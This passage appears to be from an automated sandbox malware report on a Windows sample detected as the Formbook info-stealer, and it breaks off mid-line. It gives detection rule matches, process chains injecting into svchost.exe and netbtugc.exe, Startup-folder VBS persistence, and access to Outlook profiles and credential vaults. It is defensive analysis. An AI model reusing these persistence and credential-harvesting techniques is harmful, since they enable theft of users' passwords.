Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0347DBF9	3_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345FB80	3_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FFA49	3_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F7A46	3_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B3A6C	3_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034EDAC6	3_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034DDAAC	3_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03485AA0	3_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034E1AA3	3_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03449950	3_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345B950	3_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034D5910	3_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034AD800	3_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034438E0	3_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FFF09	3_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03403FD2	3_2_03403FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03403FD5	3_2_03403FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03441F92	3_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FFFB1	3_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03449EB0	3_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03443D40	3_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F1D5A	3_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034F7D73	3_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0345FDC0	3_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034B9C32	3_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034FFCF2	3_2_034FFCF2
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02EDCB0F	4_2_02EDCB0F
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02EBF30F	4_2_02EBF30F
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02EBF306	4_2_02EBF306
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02EC5C2D	4_2_02EC5C2D
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02EC5C2F	4_2_02EC5C2F
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Code function: 4_2_02EBF52F	4_2_02EBF52F

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03487E54 appears 102 times
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: String function: 007D7F41 appears 35 times
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: String function: 007F8B40 appears 42 times
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: String function: 007F0D27 appears 70 times

Source: Document TOP19928.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2167106350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.4479572760.0000000004F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4476573595.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2168438536.0000000003790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2168337085.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4477886533.0000000003050000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4477944173.0000000003090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2233898775.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4477842256.0000000002BA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@14/11@16/13

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_0083A2D5 GetLastError,FormatMessageW,

0_2_0083A2D5

Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00828713 AdjustTokenPrivileges,CloseHandle,		0_2_00828713
Source: C:\Users\user\Desktop\Document TOP19928.exe	Code function: 0_2_00828CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00828CC3

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_0083B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0083B59E

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_0084F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0084F121

Source: C:\Users\user\Desktop\Document TOP19928.exe

Code function: 0_2_007D4FE9 FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_007D4FE9

Source: C:\Users\user\Desktop\Document TOP19928.exe

File created: C:\Users\user\AppData\Local\directory

Jump to behavior

Source: C:\Users\user\Desktop\Document TOP19928.exe

File created: C:\Users\user\AppData\Local\Temp\aut9C75.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Document TOP19928.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000005.00000002.4476837746.0000000002DDD000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4476837746.0000000002D8E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2362525005.0000000002DAF000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2364262449.0000000002DBB000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4476837746.0000000002DAF000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Document TOP19928.exe	Virustotal: Detection: 65%
Source: Document TOP19928.exe	ReversingLabs: Detection: 71%

Source: C:\Users\user\Desktop\Document TOP19928.exe

File read: C:\Users\user\Desktop\Document TOP19928.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Document TOP19928.exe "C:\Users\user\Desktop\Document TOP19928.exe"
Source: C:\Users\user\Desktop\Document TOP19928.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\Document TOP19928.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Document TOP19928.exe"
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Document TOP19928.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\Desktop\Document TOP19928.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Document TOP19928.exe"	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Document TOP19928.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\AowfzGjzPDZnxmsLOPlmgdpaaoCmTVIIMVOMZbKuQLXqBm\HAeLffQrBWbBcOffDKoNxdCPr.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HAeLffQrBWbBcOffDKoNxdCPr.exe, 00000004.00000002.4477093923.0000000000DBE000.00000002.00000001.01000000.00000005.sdmp, HAeLffQrBWbBcOffDKoNxdCPr.exe, 0000000A.00000000.2253854673.0000000000DBE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: name.exe, 00000002.00000003.2022470465.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000002.00000003.2026449015.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2167849289.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2077285315.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2167849289.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2074987804.0000000003000000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2171018368.0000000003208000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478157604.00000000033B0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000002.4478157604.000000000354E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000005.00000003.2167126471.0000000003056000.00000004.00000020.00020000.00000000.sdmp, name.exe, 00000007.00000003.2163353452.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000007.00000003.2162748029.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2234431082.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 